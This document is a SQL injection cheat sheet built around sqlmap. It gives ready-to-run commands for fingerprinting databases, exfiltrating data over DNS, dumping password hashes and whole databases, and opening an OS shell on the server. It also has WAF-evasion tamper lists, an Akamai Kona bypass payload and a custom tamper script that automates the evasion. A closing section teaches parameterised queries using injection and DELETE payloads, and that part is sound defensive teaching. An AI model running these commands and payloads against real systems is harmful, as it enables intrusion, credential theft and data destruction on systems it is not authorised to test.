SQL Injection

SQL Injection CheatSheet

SQLMap

Clone from dev for bleeding edge:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Initial information about the injection

Note on targets: -u/--url expects a URL, -r expects a saved HTTP request file (the original used -u with a request file, which sqlmap rejects). The examples below use -r; swap in --url="<url>" to target a URL directly.

Fingerprinting (-f/--fingerprint gives a detailed DBMS version fingerprint; --dns-domain is only needed for DNS exfiltration on blind injections, and sqlmap must then run on the host that is the authoritative name server for that domain with UDP 53 reachable):

./sqlmap.py -r <request-file> --fingerprint --dns-domain=dns.example.org

Get the database banner:

./sqlmap.py --url="<url>" --data="<post-data>" --banner

Get the database user, current database name and hostname:

./sqlmap.py -r <request-file> --current-user --current-db --hostname

Run SQLMap via a request file (e.g. a raw request saved from Burp or ZAP)

python sqlmap-dev/sqlmap.py -r login-request.txt

Sample request file

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1*

sqlmap's custom injection marker is an asterisk (*) placed right after the value to test ("%INJECT HERE%" is not a marker sqlmap understands). Without a marker sqlmap tests every parameter in the request; restrict it with -p <param>.

Bypassing

Identify WAF. Current sqlmap releases no longer accept --identify-waf (WAF/IPS detection is heuristic and runs automatically; disable it with --skip-waf), so drop the flag on recent builds. --safe-url is a harmless page on the target that sqlmap visits periodically to keep the session alive and avoid lockouts; it should not point at a third-party site:

./sqlmap.py -r <request-file> --identify-waf --safe-url=<safe-url> --user-agent=AGENT

Bypass anti-CSRF tokens (--csrf-token names the parameter that carries the token, --csrf-url is the page sqlmap fetches a fresh token from before each request; a target via -r or -u is still required):

./sqlmap.py -r <request-file> --csrf-url=<token-page-url> --csrf-token=CSRF_TOKEN

Tamper scripts (the flag is --level, not --levelv, and the script names are space2comment and randomcomments; the proxy routes every request through a local interceptor such as Burp):

sqlmap.py -r reg.txt --level=3 --risk=3 -p keys --dbms=mysql --tamper=space2comment,randomcomments --proxy=http://localhost:8888

Checking Permissions

Check if the current database user is a DBA:

./sqlmap.py -r <request-file> --is-dba

Enumerate database users, password hashes, privileges, roles and databases (sqlmap offers to crack retrieved hashes with a wordlist; --privileges and --roles need read access to the DBMS system tables):

./sqlmap.py -r <request-file> --users --passwords --privileges --roles --dbs

Dumping Database

Enumerate databases:

./sqlmap.py -r <request-file> --dbs

Extract data (omit -C to dump every column of the table, omit -T as well to dump the whole database):

./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

List tables of one database:

./sqlmap.py -r <request-file> -D <db-name> --tables

List columns of one database (add -T <tbl-name> to restrict to one table):

./sqlmap.py -r <request-file> -D <db-name> --columns

List the schema of one database:

./sqlmap.py -r <request-file> -D <db-name> --schema

Other database flags (count the rows of each table):

./sqlmap.py -r <request-file> -D <db-name> --count

Execute an arbitrary SQL query through the injection:

./sqlmap.py -r <request-file> --sql-query="<sql-query>"

Prepend/append strings to every injected payload (useful when the injection point sits inside brackets or quotes that the detection phase cannot work out on its own):

./sqlmap.py -r <request-file> --prefix="<prefix>" --suffix="<suffix>"

Get an OS shell through the database server. This needs DBA-level privileges (xp_cmdshell on MSSQL) or file-write privileges to drop a UDF library or a web stager on MySQL/PostgreSQL; either way it leaves artifacts on the target, which should be recorded and cleaned up during an engagement:

./sqlmap.py -r <request-file> --os-shell

Run from a request file with threads (sqlmap caps --threads at 10):

python sqlmap-dev/sqlmap.py -r login-request.txt --threads=10

Run from a request file with maximum level and risk (level 5 also tests Cookie, User-Agent, Referer and Host; risk 3 adds OR-based payloads that can modify data if the injection point is inside an UPDATE or DELETE):

python sqlmap-dev/sqlmap.py -r login-request.txt --level=5 --risk=3

Tampering:

sqlmap applies tamper scripts to every payload in the order given (after sorting by each script's priority). Long chains like the ones below are for brute-force testing against a WAF; they slow down detection and some scripts undo each other, so narrow the list once you know which transformation gets through.

General Tamper Testing:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL Tamper Testing:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL Tamper Testing:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Bypassing

Akamai Kona Bypass (MySQL syntax)

  • MID instead of SUBSTRING (MID is a MySQL alias of SUBSTRING)
  • LIKE instead of = (note that LIKE is case-insensitive under the default collations and treats % and _ as wildcards)
  • /**/ instead of a space
  • CURRENT_USER instead of CURRENT_USER()
  • " instead of ' (valid as a string delimiter in MySQL unless sql_mode includes ANSI_QUOTES, which makes double quotes identifier quotes)

Final example, a boolean-based blind test that is true when the current user's name starts with "p" (# is the MySQL line comment, so no trailing space is needed):

444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
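The substitutions above are exactly what a sqlmap tamper script automates, so that the tamper lists earlier on this page and the Akamai Kona rewrite can be combined in one run. The script below is an added example, not part of the original page and not one of sqlmap's shipped tamper scripts; the file name kona_mysql.py and the payloads it is tested on are assumptions. It rewrites single-quoted literals to double quotes (only when the quotes are balanced, so a leading quote that closes the application's own string is left alone), swaps SUBSTRING for MID, bare = for LIKE and CURRENT_USER() for CURRENT_USER, then replaces every whitespace run outside string literals with /**/, keeping the space after -- so MySQL still sees a comment.

```python
#!/usr/bin/env python
"""
sqlmap tamper script applying the Akamai Kona substitutions for MySQL.
Added example (not from the page or from sqlmap's tamper/ directory).
Assumed usage: copy into sqlmap's tamper/ directory as kona_mysql.py and run
    sqlmap.py -r req.txt --dbms=mysql --tamper=kona_mysql
sqlmap only requires a tamper(payload, **kwargs) function; __priority__ and
dependencies() are the optional hooks its loader also looks for.
"""
import re

try:
    # Present when loaded from inside the sqlmap tree; not needed stand-alone.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    __priority__ = 0


def dependencies():
    pass


# Keyword rewrites applied outside string literals (case-insensitive).
_KEYWORD_SUBS = (
    (re.compile(r"\bSUBSTRING\s*\(", re.I), "MID("),
    (re.compile(r"\bSUBSTR\s*\(", re.I), "MID("),
    (re.compile(r"\bCURRENT_USER\s*\(\s*\)", re.I), "CURRENT_USER"),
)
# A bare "=" (not part of <=, >=, != or <>), replaced by LIKE.
_BARE_EQUALS = re.compile(r"(?<![<>!=])=(?!=)")
# Whitespace runs, except the one that makes "-- " a valid MySQL comment.
_SPACE_RUN = re.compile(r"(?<!--)\s+")
# Double-quoted literal (after requoting) so rewrites skip string contents.
_LITERAL = re.compile(r'"(?:[^"\\]|\\.)*"')


def _requote(payload):
    """Turn balanced single-quoted literals into double-quoted ones.
    '' inside a literal becomes a plain ', which needs no escaping inside
    double quotes; existing double quotes inside the literal are escaped.
    An unterminated quote (e.g. the quote that closes the application's own
    string) is left untouched together with everything after it."""
    out = []
    i, n = 0, len(payload)
    while i < n:
        if payload[i] != "'":
            out.append(payload[i])
            i += 1
            continue
        j, buf = i + 1, []
        while j < n:
            if payload[j] == "'":
                if j + 1 < n and payload[j + 1] == "'":
                    buf.append("'")  # escaped quote inside the literal
                    j += 2
                    continue
                break  # closing quote found
            buf.append(payload[j])
            j += 1
        if j >= n:  # unterminated: keep the rest verbatim
            out.append(payload[i:])
            break
        out.append('"' + "".join(buf).replace('"', '\\"') + '"')
        i = j + 1
    return "".join(out)


def _rewrite_code(chunk):
    """Apply the keyword, comparison and whitespace rewrites to SQL code
    that lies outside string literals."""
    for pattern, replacement in _KEYWORD_SUBS:
        chunk = pattern.sub(replacement, chunk)
    chunk = _BARE_EQUALS.sub(" LIKE ", chunk)
    return _SPACE_RUN.sub("/**/", chunk)


def tamper(payload, **kwargs):
    """sqlmap entry point: returns the rewritten payload."""
    if not payload:
        return payload
    payload = _requote(payload)
    pieces, pos = [], 0
    for match in _LITERAL.finditer(payload):
        pieces.append(_rewrite_code(payload[pos:match.start()]))
        pieces.append(match.group(0))  # string literal kept as-is
        pos = match.end()
    pieces.append(_rewrite_code(payload[pos:]))
    return "".join(pieces)


if __name__ == "__main__":
    # Constructed sample payloads in sqlmap's usual shape.
    for sample in ("1 AND SUBSTRING(CURRENT_USER(),1,1)='p'", "' AND 1=1-- -"):
        print(sample, "->", tamper(sample))
```

Because LIKE replaces =, the comparisons sqlmap generates become case-insensitive under MySQL's default collations, so character-by-character extraction of mixed-case data may need a BINARY cast added via --prefix/--suffix or a further tamper step.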

Blogs

  • https://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
  • https://isc.sans.edu/diary.html?storyid=9397
  • http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
  • http://www.sqlteam.com/article/sql-server-versions
  • http://www.owasp.org/index.php/Testing_for_MS_Access
  • http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html
  • http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
  • http://www.youtube.com/watch?v=WkHkryIoLD0
  • http://vimeo.com/3418947
  • http://websec.files.wordpress.com/2010/11/sqli2.pdf

Stored Procedure

Stored procedures are only safe while they are parameterised all the way through. As soon as a procedure assembles a query string from its arguments and runs it with EXEC() (or EXECUTE, or sp_executesql without parameters), the argument is parsed as SQL and the injection is exactly the same as if the application had concatenated the query itself; stacked statements in the argument run as part of the batch.
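The point above, shown as an added example that is not part of the original page: the same query is built the EXEC() way (string concatenation, executed as a batch) and the sp_executesql way (a bound parameter), run against a constructed in-memory SQLite table so it works offline. The users table, its rows and the two payloads are assumptions for the demonstration; SQLite's executescript stands in for EXEC(@sql) because both execute a batch of stacked statements.

```python
import sqlite3

# Constructed sample data (not from the page).
SAMPLE_USERS = [
    (1, "alice", "alice@example.org"),
    (2, "bob", "bob@example.org"),
    (3, "priya", "priya@example.org"),
]


def make_db():
    """Fresh in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, username):
    """Equivalent of a procedure that concatenates its argument into @sql and
    runs EXEC(@sql): the argument is parsed as SQL, so a quote breaks out."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def run_vulnerable_batch(conn, username):
    """Same concatenation, executed as a batch (what EXEC(@sql) does in
    T-SQL): stacked statements smuggled in the argument run as well.
    Returns the number of rows left in the table afterwards."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "';"
    conn.executescript(sql)
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def find_user_safe(conn, username):
    """Equivalent of sp_executesql with a typed parameter: the argument is
    bound as data and cannot change the statement's structure."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed payloads: one breaks out of the literal, one stacks a statement.
PAYLOAD_BYPASS = "x' OR 1=1 --"
PAYLOAD_STACKED = "x'; DELETE FROM users; --"


def demo():
    """Run both variants with both payloads and return what each produced."""
    conn = make_db()
    results = {
        "vulnerable_bypass": find_user_vulnerable(conn, PAYLOAD_BYPASS),
        "safe_bypass": find_user_safe(conn, PAYLOAD_BYPASS),
        "safe_legit": find_user_safe(conn, "bob"),
        "rows_after_stacked": run_vulnerable_batch(conn, PAYLOAD_STACKED),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The concatenating variant returns every user for the first payload and loses the whole table to the second; the parameterised variant returns nothing for the payload and only bob's row for a real name. When the dynamic part is an identifier that cannot be bound (a table or column name), validate it against an allow-list and wrap it with QUOTENAME rather than falling back to concatenation.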